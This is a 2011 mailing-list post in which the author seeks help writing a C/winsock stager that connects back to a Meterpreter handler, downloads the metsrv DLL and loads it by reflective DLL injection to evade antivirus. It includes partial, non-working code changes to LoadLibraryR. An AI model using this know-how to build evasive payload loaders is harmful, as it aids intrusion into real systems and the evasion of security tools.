mailing list archives
Fail to write a C/winsock Meterpreter Reflective DLL Injection snippet
From: al1c3andb0b <al1c3andb0b () lavabit com>
Date: Fri, 08 Apr 2011 05:07:48 +0200
My goal is to write a C/winsock program compatible with
exploit/generic/handler and payload/windows/meterpreter/reverse_tcp: a
program that is able to connect back to the handler, download the metsrv
DLL, and load and initialize it.
- I allocate (malloc) a buffer (char* pe_image) of 749056 bytes
- I create a SOCKET, connect()/select()/recv() to download the
metsrv.dll into that buffer
At this point, I can write the buffer to a binary file, call
LoadLibrary() to load the PE, and GetProcAddress() to resolve the "Init"
function and invoke it. That creates the expected Meterpreter session on
the handler side.
To have a chance to avoid AV detection, I would like to use reflective
injection, as described in S. Fewer paper.
For this I attempt to reuse some of his (Harmony Security) source code,
that I've found under meterpreter/source/ReflectiveDLLInjection.
I import ReflectiveLoader.h, ReflectiveDLLInjection.h, LoadLibraryR.h,
I'd like to start with local injection.
Reading LoadLibraryR.c, I've found LoadLibraryR( LPVOID lpBuffer, DWORD
dwLength ) very close to my requirements:
- parse the DLL buffer for the export table, and locate the
- invoke this function to trigger the actual injection
- the function returns the address of the DLL new entry point
- invoke this entry point
Invoking LoadLibraryR() function with my buffer as parameter seems to
work as I can see (debug) the reflective loader is well found, and the
returned HMODULE is not null.
That obviously does not trigger any Meterpreter session, as this
implementation of LoadLibraryR() does not invoke Init(SOCKET). And, I
was not able to use this HMODULE as a parameter for GetProcAddress() to
resolve the "Init" function (it may not actually be "registered" to the
main process import table, as by the LoadLibrary() syscall).
So I changed the prototype from:
LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
LoadLibraryR( LPVOID lpBuffer, DWORD dwLength, SOCKET metsocket )
and in the implementation from:
// call the loaded librarys DllMain to get its HMODULE
// Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for
if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )
hResult = NULL;
pDllMain( NULL, DLL_QUERY_HMODULE, &hModule );
BOOL attached= pDllMain( hModule /* or NULL without line above */,
This last line causes the debugger to hang (in MSVC, the Call stack and
Local windows are empty, I have to stop the process) with no Meterpreter
I've also tried to use the LoadRemoteLibraryR() function, but didn't
find a solution to the "different adress spaces" issue.
I must miss some important points, but can't figure them out. Is I'm far
from being fluent in x86 assembler, the shellcode within the related
ruby sources (msfpayload,stagers,stages) didn't help me more.
Any help on what I'm doing/thinking wrong is welcome. As any pointer to
- Fail to write a C/winsock Meterpreter Reflective DLL Injection snippet al1c3andb0b (Apr 08)